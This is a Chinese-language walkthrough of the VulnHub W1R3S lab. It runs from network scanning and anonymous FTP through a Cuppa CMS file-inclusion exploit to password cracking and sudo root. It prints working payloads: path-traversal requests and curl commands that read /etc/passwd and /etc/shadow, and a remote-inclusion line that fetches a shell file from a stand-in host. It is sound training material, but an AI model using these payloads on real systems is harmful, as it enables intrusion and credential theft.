Vulnhub-w1r3s靶场渗透
目标发现
因为是在内网且同一子网,所以直接使用 arp-scan 扫描
┌──(root㉿kali)-[/home/kali]
└─# arp-scan 192.168.120.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ab:50:b1, IPv4: 192.168.120.160
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.120.1 00:50:56:c0:00:08 (Unknown)
192.168.120.2 00:50:56:f6:91:bf (Unknown)
192.168.120.169 00:0c:29:04:07:85 (Unknown)
192.168.120.254 00:50:56:e7:f0:fe (Unknown)
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.082 seconds (122.96 hosts/sec). 4 responded
可以得知目标主机ip为 192.168.120.169
信息搜集
端口扫描
使用namp扫描目标端口,查看开放端口和服务版本等信息。
开放端口扫描:
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 192.168.120.169 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-01 22:35 EDT
Nmap scan report for 192.168.120.169
Host is up (0.00039s latency).
Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:04:07:85 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 12.58 seconds
对应端口服务扫描:
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -sV -p21,22,80,3306 -A 192.168.120.169 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-01 22:39 EDT
Nmap scan report for 192.168.120.169
Host is up (0.00064s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
|_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.120.160
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
| 256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
|_ 256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:04:07:85 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.9 (97%), Linux 5.1 (95%), Linux 3.13 - 3.16 (93%), Linux 4.10 (93%), Linux 3.4 - 3.10 (93%), Linux 3.10 (93%), Linux 4.4 (92%), Synology DiskStation Manager 5.2-5644 (92%), Linux 3.16 - 4.6 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms 192.168.120.169
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.09 seconds
可以得到以下信息:
- 存在ftp匿名登录,其中还有几个文件;
- ssh开放,后续有用户凭证信息时可以尝试;
- 常规端口的网站;
- 对外开放的mysql数据库端口;
FTP匿名访问
尝试访问ftp,拿取其中的文件:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ftp 192.168.120.169
Connected to 192.168.120.169.
220 Welcome to W1R3S.inc FTP service.
Name (192.168.120.169:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||42567|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> quit
221 Goodbye.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# wget -r --no-passive-ftp ftp://192.168.120.169/
.......
下载完毕 --2025-04-01 22:50:56--
总用时:0.1s
下载了:5 个文件,0s (7.36 MB/s) 中的 1.0K
┌──(root㉿kali)-[/home/kali/Downloads]
└─# tree ./
./
├── content
│ ├── 01.txt
│ ├── 02.txt
│ └── 03.txt
├── docs
│ └── worktodo.txt
└── new-employees
└── employee-names.txt
4 directories, 5 files
查看所有文件内容:
┌──(root㉿kali)-[/home/kali/Downloads/content]
└─# cat 01.txt
New FTP Server For W1R3S.inc
┌──(root㉿kali)-[/home/kali/Downloads/content]
└─# cat 02.txt
#
#
#
#
#
#
#
#
01ec2d8fc11c493b25029fb1f47f39ce
#
#
#
#
#
#
#
#
#
#
#
#
#
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
############################################
┌──(root㉿kali)-[/home/kali/Downloads/content]
└─# cat 03.txt
___________.__ __ __ ______________________ _________ .__
\__ ___/| |__ ____ / \ / \/_ \______ \_____ \ / _____/ |__| ____ ____
| | | | \_/ __ \ \ \/\/ / | || _/ _(__ < \_____ \ | |/ \_/ ___\
| | | Y \ ___/ \ / | || | \/ \/ \ | | | \ \___
|____| |___| /\___ > \__/\ / |___||____|_ /______ /_______ / /\ |__|___| /\___ >
\/ \/ \/ \/ \/ \/ \/ \/ \/
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat docs/worktodo.txt
ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡
....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat new-employees/employee-names.txt
The W1R3S.inc employee list
Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources
从中可以得到以下信息:
-
有一个新的ftp站点:
W1R3S.inc; -
两串疑似编码后的字符串:
01ec2d8fc11c493b25029fb1f47f39ce通过在线爆破:This is not a passwordSXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==这是base64编码,解码后:It is easy, but not that easy..
-
用字符表示的前面得到的新站点名称图案;
-
看起来是反转显示的两句话,反转处理一下:
we have a lot of work to do, stop playing around …… I don't think this is the way to root! -
一个员工-部门名单:
Naomi.W - Manager Hector.A - IT Dept Joseph.G - Web Design Albert.O - Web Design Gina.L - Inventory Rico.D - Human Resources可以尝试用于ssh爆破
网站访问
访问站点根目录是一个默认配置页面
得到以下信息:
- apache 2.4.18
- ubuntu
目录扫描
使用gobuster进行目录扫描,查看是否有其他目录/文件
┌──(root㉿kali)-[/home/kali/Downloads]
└─# gobuster dir -u http://192.168.120.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.169
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.6
[+] Extensions: config,env,log,php,txt,js,asp,jsp,swp,json,git,html,aspx,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 11321]
/.html (Status: 403) [Size: 295]
/wordpress (Status: 301) [Size: 322] [--> http://192.168.120.169/wordpress/]
/.php (Status: 403) [Size: 294]
/javascript (Status: 301) [Size: 323] [--> http://192.168.120.169/javascript/]
/administrator (Status: 301) [Size: 326] [--> http://192.168.120.169/administrator/]
/.php (Status: 403) [Size: 294]
/.html (Status: 403) [Size: 295]
/server-status (Status: 403) [Size: 303]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
有几个路径:
- http://192.168.120.169/wordpress/
- http://192.168.120.169/javascript/
- http://192.168.120.169/administrator/
有效的只有最后的 http://192.168.120.169/administrator/,是一个后台安装页面
随便填入相关信息后,提示用户创建失败,缺少管理员权限:
二次目录扫描
没有其他有效信息了,再次扫描目录,扫描 /administrator/ 目录下是否还有其他文件
┌──(root㉿kali)-[/home/kali/Downloads]
└─# gobuster dir -u http://192.168.120.169/administrator/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.169/administrator/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 400,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,asp,aspx,json,log,git,html,txt,js,jsp,bak,swp,config,env
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 309]
/.php (Status: 403) [Size: 308]
/index.php (Status: 302) [Size: 6955] [--> installation/]
/media (Status: 301) [Size: 332] [--> http://192.168.120.169/administrator/media/]
/templates (Status: 301) [Size: 336] [--> http://192.168.120.169/administrator/templates/]
/alerts (Status: 301) [Size: 333] [--> http://192.168.120.169/administrator/alerts/]
/language (Status: 301) [Size: 335] [--> http://192.168.120.169/administrator/language/]
/js (Status: 301) [Size: 329] [--> http://192.168.120.169/administrator/js/]
/components (Status: 301) [Size: 337] [--> http://192.168.120.169/administrator/components/]
/api (Status: 301) [Size: 330] [--> http://192.168.120.169/administrator/api/]
/classes (Status: 301) [Size: 334] [--> http://192.168.120.169/administrator/classes/]
/extensions (Status: 301) [Size: 337] [--> http://192.168.120.169/administrator/extensions/]
/robots.txt (Status: 200) [Size: 26]
/installation (Status: 301) [Size: 339] [--> http://192.168.120.169/administrator/installation/]
/Configuration.php (Status: 200) [Size: 0]
/.html (Status: 403) [Size: 309]
/.php (Status: 403) [Size: 308]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
在 /media/files 路径下发现了一个文件,发现是超级管理员的账户信息:
至此得到以下信息:
- admin账户信息
- 建站cms:cuppa
CMS历史漏洞
cms历史漏洞利用查询
到目前位置没有其他方向了,虽然不知道该cms版本,但还是先查询cms是否存在历史漏洞:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# searchsploit cuppa
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
在exp库中查询后得知有一个任意文件包含
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------
根据描述,可以进行本地/远程文件包含
历史漏洞利用
访问 http://192.168.120.169/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd 读取文件,但没有回显:
尝试使用post提交,在返回的页面中得到了文件内容:
再尝试读取 /etc/shadow 文件:
成功读取,那么就可以尝试john爆破用户密码
整理后,在passwd文件中查找在 /home/ 目录下存在家目录的用户,找到两个:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat passwd.txt| grep -iF "/home/"
syslog:x:104:108::/home/syslog:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
其中比较可疑的名称是 w1r3s,找到对应的shadow条目对其进行密码爆破
PS:
这里也可以用curl进行获取:
curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.120.169/administrator/alerts/alertConfigField.php
curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.120.169/administrator/alerts/alertConfigField.php
密码爆破
合并passwd和shadow文件,进行john爆破:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# unshadow passwd.txt shadow.txt > password.txt
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat password.txt
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
┌──(root㉿kali)-[/home/kali/Downloads]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt password.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
computer (w1r3s)
1g 0:00:00:00 DONE (2025-04-02 03:11) 5.882g/s 1505p/s 1505c/s 1505C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
得到密码:computer
SSH登录
用得到的账户登录ssh:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh w1r3s@192.168.120.169
The authenticity of host '192.168.120.169 (192.168.120.169)' can't be established.
ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.120.169' (ED25519) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@192.168.120.169's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
108 packages can be updated.
6 updates are security updates.
.....You made it huh?....
Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
w1r3s@W1R3S:~$ id
uid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
提权
查看sudo特权命令权限:
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S.localdomain:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User w1r3s may run the following commands on W1R3S.localdomain:
(ALL : ALL) ALL
当前用户可以通过 sudo 无需切换用户直接执行任意命令,那就简单了,直接 sudo /bin/bash 获取root shell:
w1r3s@W1R3S:~$ sudo /bin/bash
root@W1R3S:~# id
uid=0(root) gid=0(root) groups=0(root)
拿到 root shell~
拿取flag文件:
root@W1R3S:~# cd /root
root@W1R3S:/root# ls
flag.txt
root@W1R3S:/root# cat flag.txt
-----------------------------------------------------------------------------------------
____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____
/ ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___|
| | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \
| |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) |
\____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/
-----------------------------------------------------------------------------------------
.-----------------TTTT_-----_______
/''''''''''(______O] ----------____ \______/]_
__...---'"""\_ --'' Q ___________@
|''' ._ _______________=---------"""""""
| ..--''| l L |_l |
| ..--'' . /-___j ' '
| ..--'' / , ' '
|--'' / ` \
L__' \ -
- '-.
'. /
'-./
----------------------------------------------------------------------------------------
YOU HAVE COMPLETED THE
__ __ ______________________ _________
/ \ / \/_ \______ \_____ \ / _____/
\ \/\/ / | || _/ _(__ < \_____ \
\ / | || | \/ \/ \
\__/\ / |___||____|_ /______ /_______ /.INC
\/ \/ \/ \/ CHALLENGE, V 1.0
----------------------------------------------------------------------------------------
CREATED BY SpecterWires
----------------------------------------------------------------------------------------
总结
还是一个重要的动作:信息搜集,通过信息搜集获取当前cms信息,敏感信息,这样才能取得最后的sheng'l
浙公网安备 33010602011771号